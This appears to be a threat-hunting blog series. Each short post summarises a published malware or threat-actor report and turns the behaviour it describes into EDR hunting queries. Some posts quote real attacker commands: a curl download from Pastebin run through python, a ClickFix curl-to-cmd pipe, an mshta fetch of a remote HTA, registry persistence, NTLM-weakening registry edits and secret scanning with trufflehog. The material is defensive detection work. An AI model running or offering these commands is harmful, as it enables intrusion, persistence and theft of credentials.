Know Your Adversary

Hello everyone! Let's look at a bit less common way to identify suspicious and malicious software - analyzing program database (PDB) paths. In some cases the adversary really wants us to understand the goals and find the malware. Let's look at an example. A Bookworm malware sample. According to the report , it has the following PDB path: C:\Users\hack\Documents\WhiteFile\LTDIS13n\Release\LTDIS13n.pdb Yes, "hack". So, if your EDR solution collects information about PDB paths, this may be a good detection opportunity: event_type: "processcreatewin" AND proc_file_pdb_path: "hack" Also, make sure to check the report to look at how to use The Unit 42 Attribution Framework in practice. See you tomorrow!

Hello everyone! As you know, in some cases adversaries choose very interesting staging folders to store their toolset on the compromised system. This fact, of course, may provide us hunting opportunities! Let's look at CountLoader. According to the report , it has the folowing capabilities among others: Download a file to the %userprofile%\Music\ directory and execute it. Download a DLL to the %userprofile%\Music\ directory and execute it with rundll32.exe. Download an MSI file to the %userprofile%\Music\ directory and execute it with msiexec.exe. First, we can hunt for any executions from Music folder: event_type: "processcreatewin" AND proc_file_path: "music" Second, we can hunt for rundll32.exe or msiexec.exe executing suspicious files from Music folder: event_type: "processcreatewin" AND proc_file_path: ("rundll32.exe" OR "msiexec.exe") AND cmdline: "music" See you tomorrow!

Hello everyone! Adveraries, especially ransomware gangs, often abuse legitimate RMMs. But do them need to bring such software with them? In some cases - they don't! For example, this case covered by Barracuda. Akira ransomware affiliates got access to Datto RMM tool’s management console and used it to execute the attack. So it's always a good idea to hunt for abnormal RMM-related behavior. To find Datto RMM, for example, you can look for accordingly signed files: event_type: "processcreatewin" AND proc_file_sig: "datto" Also, you can always look for Datto-related domain resolutions: event_type: "dnsreqwin" AND dns_rname: "rmm.datto.com" See you tomorrow!

Hello everyone! I'm sure you already heard about  Shai-Hulud - a self-replicating supply-chain worm discovered in mid-September 2025. Let's look at some of its behaviors and transform into hunting queries! This first behavior that caught my attention was abusing trufflehog to look for sensitive data in the filesystem: trufflehog filesystem . --json --results=verified We can easily transform it into a hunting query: event_type: ("processcreatemac" OR "processcreatenix") AND proc_file_name: "trufflehog" AND cmdline: ("filesystem" AND "json" AND "results" AND "verified") Another interesting behavior is related to sensitive data exfiltration. The adversary abused  webhook[.]site to acheive it, and it's another hunting opportunity: event_type: ("dnsreqmac" OR "dnsreqnix") AND dns_rname: "webhook.site" See you tomorrow!

Hello everyone! Today we'll look at another persistence mechanism, which you don't see ITW very often. I'm talking about the following technique -  Boot or Logon Autostart Execution: Winlogon Helper DLL (T1547.004) . According to this report , the adversary modified Winlogon key in order to achieve persistence: reg add '"hkcu\software\microsoft\windows nt\currentversion\winlogon'" /f /v Shell /t REG_SZ /d '"$($sv.Replace('"', '\"'))'""  Such registry modification enables the malicious script to run at every user login along with explorer.exe. At the same time, it's a detection opportunity for us: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "winlogon" AND "shell") See you tomorrow!

Hello everyone! Today we'll look into another great report by Zscaler. This time it's on COLDRIVER (also known as Star Blizzard, Callisto, and UNC4057). And it's full of detection and hunting ideas! The threat actor added ClickFix to their arsenal, but leveraged rundll32.exe instead of common cmd.exe , powershell.exe and mshta.exe : rundll32.exe \\captchanom[.]top\check\machinerie.dll,verifyme Here we can hunt for rundll32.exe executing DLLs located on .top (you can experiment with others, of course) domains (and yes, I love hunting for rundll32.exe abuse): event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: *top* The threat actors used Logon Script (T1037.001) for persistence: reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell -WindowStyle Hidden -ep bypass \"%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1\" \"7eHgxjgbBs3gHdkgx9AsRC\"" /f% And yes, it's ano...

Hello everyone! Let's keep digging into the report on Gamaredon and Turla collaboration. This time we'll look at another Gamaredon's malware -  PteroEffigy . PteroEffigy is another PowerShell-based downloader, and it also abuses a legitimate web service. But unlike PteroGraphin, it leverages  api.gofile[.]io instead of telegra[.]ph . Of course, we can convert this knowledge into a hunting query: event_type: "dnsreqwin" AND dns_rname: "gofile.io" AND proc_file_name: "powershell.exe" See you tomorrow!

Hello everyone! ESET released a report on potential collaboration of two notorious threat actors: Gamaredon and Turla . So let's look at some hunting opportunities. According to the report, Turla leveraged Gamaredon's downloaders to deliver its own malware. Gamaredon's downloaders, for example,  PteroGraphin , are PowerShell-based and use  telegra[.]ph for storing the payloads, so it enables us to hunt for similar behaviors: event_type: "dnsreqwin" AND dns_rname: "telegra.ph" AND proc_file_name: "powershell.exe" See you tomorrow!

Hello everyone! Ransomware gangs have almost countless arsenal of legitimate tools, which help them to solve various problems and evade defenses. Let's look at another tool they use for Exfiltration to Cloud Storage (T1567.002) . And we'll look into the report on Akira ransomware. According to it, the gang leveraged the following legitimate tools for exfiltration: WinSCP FileZilla Rclone Bitvise SSH Client The first three are quite common, and most likely already are in your threat hunting library. But what about the last one - Bitvise SSH Client? It may be an interesting target: event_type: "processcreatewin" AND proc_file_productname: "Bitvise SSH Client" See you tomorrow!

Hello everyone! IBM uncovered another malware family they called SnakeDisk , which belongs to notorious Mustang Panda (or Horned Werewolf as we track it). It leverages a very interesting technique - Replication Through Removable Media (T1091) . The malware is a USB worm, so its behaviors include moving files and executables located on external drives: robocopy <drive_letter>:\ <drive_letter>:\<urd>\<uud>\ /XD "<drive_letter>:\<urd>\" /XF "<drive_letter>:\<unendl_org>" /XF "<drive_letter>:\<usb_volumename>.exe" /XD "System Volume Information" /E  /MOVE Let's hunt for running robocopy for moving files (/MOVE option) with some files and directories excluded (/XD and /XF options): event_type: "processcreatewin" AND proc_file_path: "robocopy.exe" AND cmdline: ("xd" AND "xf" AND "move") See you tomorrow!

Hello everyone! Today we'll look inside Zscaler report , and look at some behaviours we can use to hunt for malicious PyPI packages delivering SilentSync RAT . One more time the adversary leveraged typosquatting for a legitimate package, this time for sisa , so a victim would download it instead of the legitimate one. Uncovered malicious packages,  sisaws  and secmeasure , retrieved the RAT from Pastebin using the following command: curl -sL https://pastebin[.]com/raw/jaH2uRE1 -o %TEMP%\\helper.py && python %TEMP%\\helper.py Here we have at least two huting opportunities. First, we can hunt for cURL retrieving files from Pastebin: event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: "pastebin.com" The second - running suspicious files from a temporary folder with Python interpreter: event_type: "processcreatewin" AND proc_file_path: "python.exe" AND cmdline: "temp" See you tomorrow!

Hello everyone! Let's look at another interesting Modify Registry (T1112) example. This time it's related to warning messages, which may trigger the victim. According to this report on CountLoader , the malware changes the registry value for " MaxScriptStatements " under: " HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Styles\\ " to " 10000000 ". Doing this, the adversary likely attempts to bypass warning messages thrown by MSHTA when long scripts are executed. At the same time, for us - it's another hunting opportunity: event_type: "registryvaluesetwin" AND reg_key_path: "MaxScriptStatements" See you tomorrow!

Hello everyone! Adversaries often abuse legitimate tools, but the same can be said about web services. Today we'll look at how APT28 leveraged Web Service: Bidirectional Communication (T1102.002) . According to this report , the group leveraged BeardShell malware, which used an icedrive account as a C2 channel. It's not the first time a threat actor abuses a web service, but I haven't seen this one.  As always, we can look for any suspicious network connections related to it: event_type: "dnsreqwin" AND dns_rname: "icedrive.net" See you tomorrow!

Hello everyone! Today we'll keep looking at Bloody Wolf, focusing on how the adversary uses the following technique: Exfiltration Over Web Service (T1567) . If we look into this report , we can see that the adversary used malicious JAR files to install NetSupport to the target system. The file also sent the name of the compromised system to a dedicated Telegram chat. And, of course, we can look for similar behavior: event_type: "dnsreqwin" AND dns_rname: "telegram.org" AND proc_file_path: "java.exe" See you tomorrow!

Hello everyone! As I'm speaking at KazHackStan this week, I'm going to share some insights regarding local threats. Let's start from how Bloody Wolf used Windows Management Instrumentation (T1047) . The adversary leveraged STRRAT , which abused WMI for reconnaissance: cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list" cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list" cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list" cmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter' path antivirusproduct get displayname /format:list" Of course, it's great target for hunting as always: event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: ("win32_logicaldisk" OR "w...

Hello everyone! Let's talk about discovery one more time as this is one of the best tactics to catch the bad guys before it's too late. This time we'll look at  Software Discovery (T1518) . So, according to this report , the adversary leveraged WMI for browser-related process enumeration: C:\windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_Process | Where-Object { $_.Name -eq 'chrome.exe' }"" C:\windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_Process | Where-Object { $_.Name -eq 'msedge.exe' }"" Yes, it's another great target for your threat hunting mission: event_type: "processcreatewin" AND cmdline: ("Get-WmiObject" AND "Win32_Process") AND cmdline: ("chrome.exe" OR "msedge.exe") See you tomorrow!

Hello everyone! Adversaries keep experimenting with various RMM tools. So, today we'll look at another example of  Remote Access Tools: Remote Desktop Software (T1219.002) . According to Red Canary report , this time threat actors abused  ITarian . Despite the fact the installer dropped ITarian executable to legitimate location, I think it's better to focus on its metadata, for example, CompanyName, so we can hunt for renamed versions of this RMM as well: event_type: "processcreatewin" AND proc_file_companyname: "itarian" See you tomorrow!

Hello everyone! I've brought you another PowerShell (T1059.001) procedure you may use in your threat hunting missions!  Let's look inside a new report on Head Mare (we track this cluster as Rainbow Hyena ). The adversary downloaded archives with additional backdoors from a remote server and used PowerShell to expand it: powershell expand-archive -force -path C:\ProgramData\YandexUpdate\update.zip -destinationpath C:\ProgramData\YandexUpdate\ The threat actors chose ProgramData as a staging folder, so we can use it to build the query and look for susoicious events: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("expand-archive" AND "programdata") See you tomorrow!

Hello everyone! Yes, another legitimate service is abused by adversaries for C2 channel. And this time it's Azure Functions. Azure Functions is a serverless, event-driven platform that lets you run small pieces of code (functions) in the cloud without provisioning or managing servers. And according to this report , it's now used by threat actors as C2. As always, we can hunt for such behavior focusing on suspicious processes: event_type: "dnsreqwin" AND dns_rname: "azurewebsites.net" See you tomorrow!

Hello everyone! As you know, adversaries may solve lots of problems via interacting with registry. So today we'll look at another few examples of  Modify Registry (T1112) . And one more time it's going to be the Gentlemen . For example, the adversary leverage reg.exe to allows unrestricted NTLM authentication: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 /v RestrictSendingNTLMTraffic /t REG_DWORD /d 0 /f And we can look for such behaviors, of course: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "MSV1_0") Another example is enabling Restricted Admin: reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f Why not to hunt it: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "DisableRestrictedAdmin") See you tomorrow!

Hello everyone! Today we'll look at another legitimate tool, which is used by ransomware gangs for Privilege Escalation (TA0004). According to this report , The Gentlemen ransomware gang leveraged PowerRun  to execute high-privilege operations, for example, to terminate security software. It enables adversaries to run various tools under SYSTEM or even TrustedInstaller permissions. For example, we can detect its executions: event_type: "processcreatewin" AND proc_file_productname: "powerrun" Another detection opportunity - INI file creation event: event_type: "filecreatewin" AND file_name: "PowerRun.ini" See you tomorrow!

Hello everyone! If you're reading this blog often, you are 100% sure that most of adversaries are extremely noisy. And yes, today we'll look at another noisy example, which belongs to APT37. The adversary leveraged malicious CHM files, which executed multiple quite interesting commands. For example, once again the adversary abused reg.exe for persistence: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OnedriveStandaloneUpdater /t REG_SZ /d Why not to hunt for such suspicious registry modifications events: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "run") Next it runs PowerShell to download a malicious HTA file and execute it via mshta.exe: Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 473925 2.2.2.2 || mshta http://[redacted].co.kr/files/2023/12/01/1.html" /f From threat hunting perspective, it's always a good idea to hunt for PowerShel...

Hello everyone! I think everyone is already got used to the fact that adversaries abuse Python. But there're still more interesting examples of Command and Scripting Interpreter (T1059) ! For example, according to this report ,  MostereRAT leveraged a a Ruby script to execute one of the stages: C:\ProgramData\Windows\ruby\ruby.exe -e "system('start C:\ProgramData\Windows\svchost.exe C:\ProgramData\Windows\svchost.db channel-8df91be7c24e');exit();" As you can see, ruby.exe runs from an uncommon path. You can use it and, for example, exclude common paths for your environment, to build your hunting query: event_type: "processcreatewin" AND proc_file_originalfilename: "ruby.exe" AND proc_file_path: "programdata" See you tomorrow!

Hello everyone! Dead Drop Resolver (T1102.001) technique becomes more and more popular among adversaries. Let's look at another example - how threat actors abuse Steam Community pages. We'll look at CastleRAT . Since August 2025, the malware leverages Steam Community pages as C2 dead drops. It means that we can hunt for suspicious resolutions of steamcommunity[.]com . Of course, you should not forget about exclusions, so here's what to exclude based on my telemetry: event_type: "dnsreqwin" AND dns_rname: "steamcommunity.com" AND NOT proc_file_path: ("steam.exe" OR "steam" OR "kaspersky" OR "windows defender" OR "networkservice.exe" OR "svchost.exe" OR "Counter Strike" OR "McAfee" OR "eaanticheat.gameservice.exe" OR "WinProxy" OR "NetLimiter" OR "cs.exe" OR "rave.exe" OR "ScumLauncher.exe" OR "ExpressConnect...

Hello everyone! Today we'll talk about another persistence mechanism, which is not commonly used by adversaries. I'm talking about  Boot or Logon Autostart Execution: Active Setup (T1547.014) . I spotted threat actors use it reading this report on  NightshadeC2 . The adversary created a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and set a malicious value for StubPath . The ky is commonly used by web browser updaters and some other legitimate software, so make sure to tune the query properly: event_type: "registryvaluesetwin" AND reg_key_path: ("Active Setup" AND "StubPath") AND NOT reg_value_data: ("edge" OR "chrome" OR "yandex" OR "brave" OR "citrixenterprisebrowser" OR "acrobat" OR "chromium" OR "contentreader") See you tomorrow!

Hello everyone! Stealers and discovery, one more time. This time we'll look at Stealerium, and learn how it misuses netsh.exe for  System Network Configuration Discovery: Wi-Fi Discovery (T1016.002) , and, of course, how to hunt for such activity. So, if we look into this report , we can see that the stealer used netsh.exe to collect information about Wi-Fi networks: netsh wlan show profile netsh wlan show networks mode=bssid Discovery commands are always great targets for threat hunting, just look for susicious parent processes. Ok, let's build a query: event_type: "processcreatewin" AND proc_file_path: "netsh.exe" AND cmdline: (("wlan" AND "show") AND ("networks" OR "profile")) See you tomorrow!

Hello everyone! We already looked at many ClickFix variations, but adversaries keep experimenting with this technique, so we can get more and more detection and hunting opportunities. This time we'll look at another example used by threat actors to deliver Lumma stealer. The victim is expected to run the following command: cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit; capcha code 74585 Here we can see that the adversary used command line arguments to start download process with the new window minimized. You won't see it very often to be used in legitimate way, so we can use it to create a hunting query: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("start" AND "min") See you tomorrow!

Hello everyone! Recently I spotted another persistence technique I don't see to be used by adversaries often. I'm talking about the following technique:  Change Default File Association (T1546.001) . According to this report ,  TinyLoader modified the following registry key to hijack how Windows handles text files: HKEY_CLASSES_ROOT\txtfile\shell\open\command This allows the malware to be executed every time a victim opens a .txt file. So, we can hunt for registry modification events related to this key: event_type: "registryvaluesetwin" AND reg_key_path: "txtfile\\shell\\open\\command" See you tomorrow!

Hello everyone! It's very important for an adversary to collect information about security software available on the compromised system. Let's look at another real-world example demonstrating how threat actors leverage  Security Software Discovery (T1518.001) and Query Registry (T1012) . So, according to this report ,  TamperedChef abused reg.exe (yes, again) to query system registry on order to obtain information about security software installed, for example: reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Bitdefender" /v "UninstallString" We can use security software names to build our detection: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("query" AND ("bitdefender" OR "g data antivirus" OR "checkpoint" OR "kasperskylabsetup" OR "fortinet" OR "zillya antivirus")) See you tomorrow!

Hello everyone! We all are a bit tired of PowerShell. Even adversaries. So today we'll look how they misuse another popular command and scripting interpreter - Python (T1059.006) . According to this report , the adversary used AI-themed lures to trick a victim to install  ScreenConnect . Next the threat actors run a malicious BAT file, which, among other things, executed a renamed pythonw.exe to run a base64-encoded command: "pw.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHl6aXJpcyY2F...'))" In general, nothing new, right? Base64 again. But why not to use it for hunting: event_type: "processcreatewin" AND proc_file_originalfilename: "pythonw.exe" AND cmdline: "base64.b64decode" See you tomorrow!